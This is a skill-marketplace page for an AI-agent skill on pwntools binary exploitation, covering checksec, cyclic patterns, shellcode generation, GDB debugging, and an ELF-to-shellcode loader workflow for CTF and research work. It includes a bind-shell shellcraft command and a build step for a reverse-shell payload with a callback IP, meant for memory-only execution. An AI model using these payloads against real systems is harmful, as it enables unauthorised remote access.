abelrguezr/skills/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools
skills/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools/SKILL.md
--- name: pwntools-binary-exploitation description: Use this skill whenever working with binary exploitation, reverse engineering, or CTF challenges involving PwnTools. Trigger for: generating shellcode, analyzing binaries with checksec, creating cyclic patterns for buffer overflows, converting ELF to shellcode, debugging with GDB, disassembling opcodes, or any pwntools-related task. Make sure to use this skill for any binary exploitation workflow, even if the user doesn't explicitly mention 'pw
$ install --global
skillsauthnpx skillsauth add abelrguezr/hacktricks-skills skills/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntoolsInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Apr 16, 2026, 2:07 AM11.0s3 files scanned
SKILL.md
- name:
- pwntools-binary-exploitation
- description:
- Use this skill whenever working with binary exploitation, reverse engineering, or CTF challenges involving PwnTools. Trigger for: generating shellcode, analyzing binaries with checksec, creating cyclic patterns for buffer overflows, converting ELF to shellcode, debugging with GDB, disassembling opcodes, or any pwntools-related task. Make sure to use this skill for any binary exploitation workflow, even if the user doesn't explicitly mention 'pwntools' or 'pwn'.
PwnTools Binary Exploitation Helper
A skill for working with PwnTools in binary exploitation, reverse engineering, and CTF challenges.
Quick Start
pip3 install pwntools
Common Workflows
1. Binary Analysis with Checksec
Analyze binary protections before exploitation:
pwn checksec <executable>
This shows NX, PIE, Stack Canary, RELRO, and other protections.
2. Generate Cyclic Patterns for Buffer Overflows
Create unique patterns to find offsets in buffer overflows:
# Generate 3000-byte pattern
pwn cyclic 3000
# Find offset from pattern fragment
pwn cyclic -l faad
Options:
- Alphabet: lowercase chars by default
- Pattern length: default 4
- Context: 16, 32, 64-bit, linux, windows
3. Assembly and Shellcode Generation
Get opcodes from assembly:
pwn asm "jmp esp"
pwn asm -i <filepath>
Generate shellcode:
# List available shellcodes
pwn shellcraft -l
# List shellcodes matching pattern
pwn shellcraft -l amd
# Generate shellcode in C format
pwn shellcraft -f hex amd64.linux.sh
# Run shellcode to test
pwn shellcraft -r amd64.linux.sh
# Create bind shell on specific port
pwn shellcraft .r amd64.linux.bindsh 9095
Shellcode options:
- Avoid bytes: null, newlines, or custom list
- Debug: attach GDB to shellcode
- Output format: hex, string, C, ELF
- Generate as shared library
4. Debug with GDB
Attach GDB to processes:
# By executable
pwn debug --exec /bin/bash
# By PID
pwn debug --pid 1234
# By process name
pwn debug --process bash
Options:
- Context: 16, 32, 64-bit, linux, windows
- GDB script to execute
- Sysroot path
5. Disassemble and Hex Operations
Disassemble opcodes:
pwn disasm ffe4
Convert to/from hex:
# String to hex
pwn hex hola
# Hex to string
pwn unhex 686f6c61
Hexdump files:
pwn phd <file>
6. ELF to Shellcode Conversion (loader_append)
Convert a standalone ELF into raw shellcode that self-maps its segments. Ideal for memory-only loaders (e.g., Android JNI execution).
Workflow:
- Build a static, position-independent payload ELF:
musl-gcc -O3 -s -static -o exploit exploit.c \
-DREV_SHELL_IP="10.10.14.2" -DREV_SHELL_PORT="4444"
- Convert ELF to shellcode using the bundled script:
python scripts/elf_to_shellcode.py ./exploit sc
- Deliver shellcode to memory loader and execute in-process.
Notes:
loader_appendembeds the ELF and emits a loader that mmaps segments- Be explicit about architecture (amd64, arm64, etc.)
- Keep payload position-independent
- Avoid assumptions about ASLR/NX
7. Generate Exploit Template
Create a Python template for remote/local exploitation:
pwn template
Options:
- Host, port, user, password
- Path to binary
- Quiet mode
8. Additional Utilities
Disable NX on binary:
pwn disablenx <filepath>
Compare ELF files:
pwn elfdiff <file1> <file2>
Update PwnTools:
pwn update
Best Practices
- Always check protections first - Use
checksecbefore planning exploitation - Use cyclic patterns - For reliable offset discovery in buffer overflows
- Test shellcode locally - Use
pwn shellcraft -rbefore deployment - Be explicit about architecture - Set context with
context.clear(arch='amd64') - Keep shellcode position-independent - Avoid hardcoded addresses
- Avoid bad bytes - Filter nulls, newlines, and other problematic bytes
Context Settings
Always set the appropriate context for your target:
from pwn import *
context.clear(arch='amd64', os='linux') # or 'windows'
context.bits = 64
context.word_size = 8
References
- Pwntools Documentation
- CoRPhone – ELF→shellcode pipeline for Android
Related Skills
abelrguezr/house-of-lore-exploit
testing
VerifiedTrustedCommunity
How to perform a House of Lore (small bin attack) heap exploitation. Use this skill whenever the user mentions heap exploitation, small bin attacks, fake chunks, glibc heap vulnerabilities, or needs to insert fake chunks into small bins for arbitrary read/write. Trigger for CTF challenges involving heap corruption, glibc 2.31+ exploitation, or when the user needs to bypass malloc sanity checks using fake chunk linking.
5SKILL.mdUpdated Apr 16, 2026
abelrguezr/house-of-force-exploit
testing
VerifiedTrustedCommunity
How to perform House of Force heap exploitation attacks. Use this skill whenever the user mentions heap exploitation, House of Force, top chunk manipulation, arbitrary memory allocation, malloc manipulation, or wants to allocate chunks at specific addresses. Also trigger for CTF challenges involving heap overflows, top chunk size overwrites, or when the user needs to calculate evil_size for heap attacks. Make sure to use this skill for any binary exploitation task involving glibc heap manipulation, even if they don't explicitly say "House of Force".
5SKILL.mdUpdated Apr 16, 2026
abelrguezr/house-of-einherjar
tools
VerifiedTrustedCommunity
How to perform House of Einherjar heap exploitation to allocate memory at arbitrary addresses. Use this skill whenever the user mentions heap exploitation, glibc heap attacks, arbitrary memory allocation, off-by-one overflow exploitation, tcache poisoning, fast bin attacks, or any CTF challenge involving heap manipulation. This is essential for binary exploitation tasks where you need to control malloc() return addresses.
5SKILL.mdUpdated Apr 16, 2026
abelrguezr/heap-overflow-exploitation
testing
VerifiedTrustedCommunity
How to identify, analyze, and exploit heap overflow vulnerabilities in binary exploitation challenges and real-world scenarios. Use this skill whenever the user mentions heap overflows, memory corruption, heap grooming, tcache poisoning, fast-bin attacks, or any heap-related vulnerability in CTF challenges, binary analysis, or security research. This skill covers heap overflow fundamentals, exploitation techniques, heap grooming strategies, and real-world CVE analysis.
5SKILL.mdUpdated Apr 16, 2026